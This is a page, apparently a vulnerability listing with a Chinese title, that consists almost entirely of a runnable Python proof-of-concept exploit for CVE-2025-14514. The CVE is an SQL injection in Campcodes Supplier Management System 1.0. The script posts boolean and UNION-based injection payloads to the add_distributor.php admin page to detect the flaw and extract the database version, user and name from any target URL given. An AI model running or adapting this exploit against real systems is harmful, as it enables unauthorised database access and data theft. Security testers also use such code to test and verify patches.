CVE-2025-14514 Campcodes Supplier Management System 1.0 SQL注入漏洞

import requests import sys # CVE-2025-14514 PoC - SQL Injection in Campcodes Supplier Management System 1.0 # Target: /admin/add_distributor.php # Parameter: txtDistributorAddress def exploit_sqli(target_url): """ SQL Injection PoC for CVE-2025-14514 This demonstrates the vulnerability in txtDistributorAddress parameter """ # Construct the target URL endpoint = f"{target_url.rstrip('/')}/admin/add_distributor.php" # Malicious payload - Boolean-based blind SQL injection # This payload tests if the injection point is vulnerable payload = { 'txtDistributorAddress': "' OR 1=1 -- -", 'submit': 'add' } try: print(f"[*] Sending malicious request to {endpoint}") print(f"[*] Payload: {payload['txtDistributorAddress']}") # Send POST request response = requests.post(endpoint, data=payload, timeout=10) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Length: {len(response.text)}") # Check for SQL error indicators if 'mysql' in response.text.lower() or 'sql' in response.text.lower(): print("[!] Potential SQL injection detected!") return True return False except requests.RequestException as e: print(f"[-] Error: {e}") return False def extract_database_info(target_url): """ Extract database information using UNION-based injection """ endpoint = f"{target_url.rstrip('/')}/admin/add_distributor.php" # UNION-based injection to extract database version payload = { 'txtDistributorAddress': "' UNION SELECT NULL,version(),user(),database() -- -", 'submit': 'add' } try: print(f"[*] Extracting database information...") response = requests.post(endpoint, data=payload, timeout=10) return response.text except requests.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == '__main__': if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://victim.com") sys.exit(1) target = sys.argv[1] exploit_sqli(target)